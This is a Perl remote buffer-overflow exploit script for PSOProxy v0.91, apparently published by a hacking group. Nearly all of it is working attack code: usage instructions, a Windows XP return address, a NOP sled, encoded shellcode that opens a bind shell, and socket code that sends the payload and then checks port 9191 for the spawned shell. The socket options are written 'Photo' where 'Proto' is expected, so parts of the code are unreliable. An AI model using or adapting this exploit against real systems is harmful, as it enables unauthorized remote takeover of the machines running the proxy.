#!/usr/bin/perl use IO::Socket; ## __________ ___ ___ ## \______ \__ __ ______/ | \ ## | _/ | \/ ___/ _ \ ## | | \ | /\___ \\ / ## |____|_ /____//____ >\___|_ / ## -======\/==security=\/=team==\/ ## ## PSOProxy v0.91 remote bof exploit (public version) ## by 1dt.w0lf // RusH security team - http://rst.void.ru ## if (@ARGV < 3) { print "\n"; print "PSOProxy v0.91 remote bof exploit (public version)\n"; print "by RusH security team http://rst.void.ru\n\n"; print "usage: r57psoproxy.pl \n"; print " e.g.: r57psoproxy.pl 127.0.0.1 8080 1\n"; print "\ntargets:\n"; print " 1 - 0x773C4540 - winXP sp0\n"; print " 0 - 0xAAAAAAAA - dos\n"; print "\n"; exit; } $host = $ARGV[0]; $port = $ARGV[1]; $target = $ARGV[2]; if($target==1){$ret = 0x773C4540;} # winXP sp0 shell32.dll jmp esp if($target==0){$ret = 0xAAAAAAAA;} # dos $shell_code="\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA". "\xDD\x03\x64\x03\x7C\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89". "\x88\x88\x01\xCE\x4E\xE0\xBB\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77\xFE\x74\xE0\x25\x51\x8D\x46". "\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77\xFE\x74\xE0\x67\x46". "\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77\xFE\x70\xE0". "\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77\xFE". "\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A". "\x77\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88". "\x77\xDE\x7C\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77". "\xDE\x64\xDF\xDB\x77\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C". "\x24\x05\xB4\xAC\xBB\x48\xBB\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5\x01\xDC\xAC\xC0\x01\xDC\xAC". "\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE\x46\x03\x44\xE2\x77". "\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8\x84\x03\xF8". "\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90\x03". "\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3". "\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D". "\xD7\xD6\xD5\xD3\x4A\x8C\x88"; $nop_zone="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; $pack_ret = pack('l', ($ret)); $buff = "A"x1023; print "[~] connecting to host...\n"; $socket=IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Photo => "tcp") || die "[-] connect failed\n"; print "[+] connected\n"; sleep 1; print "[~] sending shellcode\n"; print $socket "$buff.$pack_ret.$nop_zone.$shell_code\r\n"; sleep 1; print "[+] shellcode sent\n"; close($socket); print "[~] trying to connect on port 9191\n"; $socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => "9191", Photo => tcp) || die "[-] damn ... connect to spawn shell failed\n"; close($socket); print "[+] shell spawned on port 9191 ... you are lucky =)\n";